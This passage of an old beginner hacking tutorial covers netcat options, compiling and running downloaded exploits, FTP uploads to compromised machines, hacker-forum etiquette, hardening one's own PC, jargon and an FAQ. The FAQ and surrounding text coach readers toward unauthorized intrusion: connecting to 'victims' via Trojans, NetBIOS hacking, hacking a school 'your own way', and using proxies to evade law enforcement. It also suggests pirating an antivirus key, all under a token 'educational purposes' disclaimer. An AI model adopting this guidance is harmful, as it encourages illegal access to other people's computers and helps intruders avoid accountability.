-r Causes port scanning to be done randomly. Normally it is done highest to lowest.

-s Used to specifiy local network source address. Usage "-s ip-addr" or "-s name".

-t Enables netcat to respond to telnet option negotiation if netcat is compiled with –DTELNET parameter. Telnet daemons will get no useful answers, as they would from a telnet program.

-u Tells netcat to use UDP instead of TCP.

-v Controls the level of verbosity.

-w Limits time trying to make connection(s)

-z Prevents sending any data via TCP/UDP to speed up Port Scans.

COMPILING EXPLOITS:

How to compile an exploit? This is something beginners ask, and it is also asked sometimes by Network Admins who wish to test there network for security vulnerabilities. Most exploits are coded in C, so to compile an exploit you will need a C compiler and knowledge of C, well a knowledge of C isn't always needed, but sometimes it is, which I will explain later on.

First of all, it is important to know whether the exploit is coded for or Windows, if you have a Windows operating system obviously you would want an exploit that is coded for Windows, so how can you tell? Well when you look at C programs (that includes exploits) you should notice that header files, what are these?

Example 1:

#include "winsock2.h"

This means that the header file is ment to be in the same folder as the exploit is, exploits you download off the internet sometimes have this, yet don't include the header file, this is often to try and stop script kiddies from compiling the exploit.

Example 2:

#include "C:\winsock2.h"

This means the winsock.h file is expected to found on the C:\ drive.

Example 3:

#include

This means the include file is ment to be included with all the other include files the compiler has.

Windows programs have include files that are included with most Windows C compilers such, these files include windows.h and winsock.h. Some Linux files are netinet/in.h and sys/socket.h. A question you might ask when looking at the Linux files is how come they have a slash in them? This indicates that the file e.g. in.h is located in the directory netinet.

My compiler gives an error that contains something to do with ws_32 or it highlights a line containing #pragma comment(lib,"ws2_32"):

The most likely problem is that you have not included the Winsock library file, if you have LCC W32 you can add this in by going to:

Project -> Configuration -> Linker -> Addition files to add

I get errors, even though I have all the include files, errors include "missing prototype" and "missing semicolon"

The missing semicolon problem can easily be fixed, if your using LCC W32 you should get an error saying, missing semicolon before: and it should highlight some line, just look for the line before and add a semicolon. What about missing prototype? If it says something like missing prototype for function: int main(int hello, world)

Well if you were to write a prototype for that you would simply do: int main(int hello, world);

Notice the semicolon on the end.

My compiler mentions some other error:

This is why you need to Learn C my friend, here is a book that you should find of help: http://www.anomalous-security.org/downloads.php?did=35

What do I do after I compile the exploit:

Well I would hope you would know this, seriously dude, but incase you don't know I at the very least would of expected you to find out what software the system is running then compiled this exploit specially for it, all you really need to do is find out what port the program is running, it will probably be a default one, if not do a Port Scan. You will most probably just have to drag the exploit into Command Prompt and then put the IP Address then the Port of the system your wishing to exploit, if your unsure, just drag the exploit into Command Prompt by itself and press enter, it should print out instructions on how to use it.

USING WINDOWS FTP:

Being able to use Windows FTP via command prompt may be important, if you were to take control over a remote system and you need to upload files on it, a good way of downloading files onto it would be by using Windows FTP, so let's play around with it. First let's just browse Microsoft's FTP server: Open command prompt and type: ftp ftp.microsoft.com Now time to enter a username, since you do not have a user name on Microsoft's FTP (at least I assume you don't) we have to login anonymously, so type "anonymous" (with out quotation marks) for the username, you should get the following response.

So type your email address and press enter, or if you want you can just press enter and you will still be logged on. We are now logged onto Microsoft's FTP server, Yay! Now it's time to download a file from the server, we have no idea where any files are so let's get a list of them, type "ls"

You may notice that all the things that have been listed for no have file extensions, this is because all the things that have been listed are in fact Folders and NOT files, so let's go into one by typing: cd MISC We should get the following response: 250 CWD command successful. Now that we are in that folder, we should get a list of files, we can do this by typing "ls" See that file I have boxed in Red? Let's download that onto the C:\ Drive by typing: get ReadMe1.txt C:\ReadMe1.txt

If you wish to upload something to the server you can do it by typing: put C:\example.txt Of course you will NOT be able to upload anything to the Microsoft FTP, or at least I assume so.

HACKER COMMUNITY:

The chances are you probably have been laughed at for asking stupid questions or saying stupid things on forums, if you don’t talk on a hacking forum I very strongly suggest you do, not only will you learn a lot but you will gain reputation in the community. Some good forums are: http://forum.zone-h.org http://governmentsecuirty.org http://blackcode.com http://hackerlounge.com http://hackerscenter.com http://www.anomalous-security.org/

If you wish to be respect in the community you must act correctly and show that you are not just a stupid script kiddie. Here are some tips:

1. Master the art of speaking English correctly. 2. Don't ask stupid questions. e.g. How do I hack? 3. Provide help to other hackers when you can. 4. Don't expect everyone else to do things for you just because you ask them to. 5. Share information with other hackers. 6. Do not flame other hackers unless absolutely necessary otherwise it will just make you look like a lamer. 7. Review your posts carefully before posting, you don't want to accidentally screw up your post and make yourself look like an idiot (I have done this too many times.) 8. Do not make posts that offend other hackers. 9. Make sure to post in the right section of the forum, and don't request Warez nearly all Internet Security/Hacking forums do not allow the posting of Warez so do not ask. 10. Do not make Thank You Posts, if your going to thank someone don't just say Thank You, add some extra stuff in, some moderators get pissed off at "Thank You Posts" 11. Do not request exploits, not only will this piss off the moderators but on some forums this is not allowed, if you want exploits search Google heavily, you should find what your looking for. 12. Do not post about potential targets or illegal activities on the forum, not only is this dangerous but it will probably make you look like an idiot, and if you do so, you probably are an idiot. 13. The search button on a forum can be a very powerful tool, the chances are if you want a piece of information it has already been talked about on the forum, so just do a search and read the posts people have made about the subject, it should educate you. 14. Don't write a tutorial about something you don't really know and post it on a forum. 15. Do NOT rip off other peoples work and try to pass it off as your own, I would think this would be common sense, but you would be surprised at how many tutorials I have seen that have just been ripped off other people, do not think you can get away with it, because if there is people like me on that forum we will expose you for the fraud that you are. 16. Do NOT argue with the moderators, if you do not like the moderators simply leave the forum and go to another forum with better moderators, arguing with the moderators will just end up with everyone on the forum flaming you. 17. Do not just post links to articles and tutorials, because it's possible the server that is hosting the article or what ever may go down, so copy and paste it and post it on the forum as well as providing a link to the original article. 18. If your going to be talking on multiple forums, it might be a good idea to use a different password for each forum, that way if someone (including the moderators) gets your password for one of the forums hopefully they will not have your password for every forum, it's possible they could make posts under your username and make you look like and idiot, by default most forums save your password as an MD5 Hash, however some have applied a mod to there forum so it's stored as plain text, so if you pissed off the moderator(s) they could have your password to the other forums. 19. If your doing malicious things with the knowledge you have, which I do not encourage, you might want to use a proxy or proxies when browsing the Internet, all law enforcement have to do is get a moderator on a forum to give them your IP Address. 20. Don't attack other peoples tutorials, people write to tutorials to try and share information with other hackers, even if there tutorial is quite bad, you should offer information to help them improve there tutorial instead of just flaming them.

BASIC SECURITY:

If your going to start hacking, it’s a good idea you secure your computer so other hackers will have a harder time attacking your computer. First download ALL of the windows updates, including SP2 if you can. After downloading all the updates, remember your still not safe, there are hackers out there that have exploits that are not patched, so its best to get a firewall, I recommend

Zone Alarm http://zonelabs.com Or Sygate http://sygate.com

Out of the two, I would say Zone Alarm is the best, however it gets annoying at times when It wont let certain programs access the internet, there’s even been cases I’ve heard of were Zone Alarm has blocked Internet access coming from a persons ISP. Try Zone Alarm, if you don’t like it get Sygate, I’m currently using Sygate. After having all the latest updates and a firewall installed, it's not time to take the last step, getting an Anti Virus program, sometimes hackers can use Trojans or other tools to disabled your Internet Security applications like Zone Alarm. I highly recommend Kaspersky Anti Virus, try searching for a trial version then getting a key file for it. If you cannot obtain Kaspersky Anti Virus, get a free one, either AntiVir or AVG. http://free-av.com (AntiVir) http://grisoft.com (AVG Anti Virus)

STAY AWAY FROM SYMATEC’S PRODUCTS (NORTON) The chances are even if you have a good Anti-Virus and Firewall, you will still be insecure, the reason for this is probably because at one point or another you will turn your firewall off to play certain games, because sometimes Firewalls accidentally filter out certain stuff that is being sent to you while your playing the game. If you have your firewall off and an attacker has a 0day exploit, to put it simply your screwed, what you need to do is disable unnecessary Windows services, so the attack has little to exploit. You can disable Windows services using the following program:

Below is a list of services I have listed, which the chances are you do not need, some of the below services might already be disabled on your system.

RPC (Remote Procedure Protocol) Port 135 NetBIOS Port 139 Universal Plug and Play Port 5000 Terminal Services Port 3389 Network Black Jack Port 1025 SMB (Server Message Block) Port 445 Messenger Port 135 Remote Registry Port 139 Telnet Port 23

HACKER JARGON/SLANG:

1337 Speak: Used to be used by 0ldsk00l h4x0rs on BBS to prevent some of there posts from being edited out.

Box: Box is slang for computer.

Script Kiddie: Someone who doesn’t know much about hacking, they just use scripts/programs that other people code, they have no idea what they really do.

Skiddie: Short for Script Kiddie

Kiddie: Basically the same as Script Kiddie.

Lamer: Someone who is “lame” lamers often are try hard script kiddies, all they wana do is be destructive and they can’t even manage to do that, do you have a friend who can “hack” with Linux? Lamers often make up shit about how good of a hacker they are, to try and get themselves respected in the hacker community, of course most of the stuff they say doesn’t make sense because they don’t even know what there talking about! 0Day: 0Day means before its official or legitimate release, people in the Warez scene also use this e.g. 0Day Warez means that if it’s 0Day it means that it hasn’t been legitimately released yet. Website Defacers often use the word 0Day exploit.

Defacer: A Defacer is someone who defaces websites, defacers are often just Advanced Script Kiddies, Defacers are seen as Lamers by most REAL hackers. Nearly all defacers come from Brazil a.k.a. Land Of The Script Kiddie. Do not get down to their low level and start defacing, they're just a bunch of script kiddies, no REAL hackers respect them at all.

DoSer/DDoSer: Some one who regularly carries out Denial of Service attacks against people, most people DDoSers are just lamers, however in Russia it is very common for DDoSers to earn very large sums of money through carrying out Denial of Service attacks.

Root: “I rooted his box, it only took 5 minutes” yes I know what your thinking lol, root means to gain or have administrator privileges on a machine.

Uber Hacker: An elite hacker in the true sense.

Black Hat/Cracker: These types of hackers are the bad hackers on the Internet, basically they're the type that hack for personal gain or purely to be destructive, most Crackers are just lamers.

White Hat/Ethical Hacker: These hackers are the good guys of the Internet, their purpose is to improve the security of the Internet, if they find a vulnerability they usually disclose it and help people patch against it.

FRENQUENTLY ASKED QUESTIONS:

Below are some frequently asked questions that beginners ask quite a lot.

1. Do I need Linux to compile an exploit? No you do not, most exploits are written for windows.

2. When I try to compile exploits I get errors! The guys that write the exploits purposely put errors in the exploits so Script Kiddies cannot compile them. If you wish to learn how to use and compile exploits you must learn C (most exploits are written in C.)

3. How can I hack hotmail? Can't help you there, do not contact me asking how.

4. When I try to connect to my victim via Trojan, it won’t connect and I have the right IP Address and other information. Your victim has either deleted the Trojan server, put up a Firewall/IDS/Port Blocker or your Trojan server is buggy (often the problem.)

5. At what point will I become a real hacker? That's a hard question to answer, because people define what a hacker is differently, most people that argue about what a hacker really is are just lamers, avoid getting into these debates because there just plain stupid.

6. How can I hack my school? If your asking that question, then I very strongly suggest you do not attempt it, you might get expelled and you will be laughed at by other people at your school. If you want to hack your school find your own way, that way you have a lot less chance of getting caught because you know what your doing.

7. How can I hack without using a Trojan?

Well if you wish to “hack” someone with out using a Trojan you could try NetBIOS Hacking, or scan there computer with a Port Scanner to see what ports are open, its possible they may be infected with a Trojan, search on Google for default Trojan ports, if they have one open try connecting with the appropriate Trojan. If you can’t hack there NetBIOS and there not infected with a Trojan, try using an exploit to break into there computer.

8. Where can get some exploits? http://security.nnov.ru http://securityfocus.com http://packetstormsecurity.com

10. My Anti-Virus detects “Some Hacking Tool” as a virus!

Anti-Virus programs often do this, to scare you from using the program you have downloaded, also adding more “viruses” into there database makes the Anti-Virus firm look good. Be aware though, sometimes people put viruses inside hacking tools, if you ever download something (except if it’s a Binder/Dropper) and it’s detect as something like W32/AYF.dropper.trojan then don’t run the “program” because someone has obviously binded a virus to it.

11. What is Linux?

Linux is an operating system coded in C which was first invented by Linus Torvalds in 1991. Linux operating systems are some of the most popular operating systems around these days, you will find quite a lot of web servers running Linux, Linux is an open source operating system. Linux is basically Unix + A GUI.

12. How do I Spoof My IP Address?

This is not as easy as you may of heard, it's not as simple as just opening up a program and letting the program spoof the IP Address for you, for you to Spoof IP Address you must code a program which carefully crafts each packet so in the header of the packet the source IP Address is incorrect.

13. What is Phreaking?

Phreaking is not related to hacking, Phreaking is actually Phone System Hacking, old school hackers were Phreakers, they had to hack phone systems in order to be able to dial in to foreign bulletin boards for little or no cost.

14. Is Hacking Illegal?

The answer to that question is hell yes! Hacking is one of the most illegal things you can, do and thanks to the Patriot Act in America (Thank god I'm not American) if you get caught hacking you could be charged as a "Terrorist" and receive life in prison with out parole! I've also heard stories where the American government have brought hackers from other countries over to America in order to charge them, so if your hacking something American be damn careful! Lovely the Patriot Act isn't it?

15. How Can I?

Search Google you would be amazed at what you might find, if you still can't find the information on Google try http://alltheweb.com And if your really having problems ask for help on a forum.

16. What programming language should I learn?

If your seriously thinking about becoming a hacker, I would strongly recommend C or possibly C++. If your planning on just programming trojans then Visual Basic may be a better option (very easy to program in.)

USEFUL LINKS:

C/C++ Programming: http://www.anomalous-security.org/downloads.php?did=36 http://www.anomalous-security.org/downloads.php?did=35 http://www.anomalous-security.org/downloads.php?did=38 http://www.cplusplus.com/doc/tutorial/

SQL/Web Application Security: http://www.securitydocs.com/library/2656 http://www.securitydocs.com/library/2651 http://www.securitydocs.com/library/1937 http://www.securitydocs.com/library/925

Cross Site Scripting/Web Application Security: http://www.steve.org.uk/Hacks/XSS/ http://ha.ckers.org/xss.html http://www.contentverification.com/cross-site-scripting/ http://www.how-to-hack.org/faq.html

Anonymity On The Internet: http://www.i-hacked.com/content/view/54/42/ http://neworder.box.sk/anonymity.php http://newdata.box.sk/raven/anonymity.txt

Buffer Overflows: http://www.nwfusion.com/details/746.html http://www.linuxsecurity.com/content/view/118881/49/ http://www-106.ibm.com/developerworks/linux/library/l-sp4.html

Web Server Security: http://httpd.apache.org/docs/misc/security_tips.html http://www.cert.org/security-improvement/modules/m11.html http://www.w3.org/Security/Faq/www-security-faq.html http://www.windowsecurity.com/articles/Web-Server-Defacements- Part1.html http://www.windowsecurity.com/articles/Web-Server-Defacements- Part2.html http://www.windowsecurity.com/articles/Web-Server-Defacements- Part3.html

Denial of Service Attacks: http://www.cert.org/tech_tips/denial_of_service.html http://www.pentics.net/denial-of-service/white-papers/smurf.cgi http://www.w3.org/Security/Faq/wwwsf6.html http://www.onlamp.com/pub/a/bsd/2004/06/24/anti_dos.html GREETZ AND FUCK OFF’S:

Greetz to syst3m of cha0s, htek, tomchu, The Goon Squad, The Media Assassins, HackJoeSite, wicked and Read101. And finally fritz from hax-studios.net the guy on my MSN list which has never said a word to me, why won't you talk damnit!

Fuck Off to all those "hackers" who call me a lamer.

DISCLAIMER:

BY READING THIS TUTORIAL YOUR AGREEING YOU KNOW THE AUTHOR OF THIS TEXT CANNOT AND WILL NOT BE HELD RESPONSIBLE FOR ANY DAMAGES ARISING FROM THE MALICIOUS USE OF THIS INFORMATION. THIS TEXT IS WRITTEN FOR EDUCATIONAL PURPOSES ONLY! YOU ARE AGREEING YOU WILL NOT CARRY OUT ANY OF THE THINGS WRITTEN IN THIS TEXT, THIS TEXT IS PURELY FOR EDUCATIONAL PURPOSES YOU’RE AGREEING YOU WILL NOT ATTEMPT ANYTHING MENTIONED IN THIS TEXT!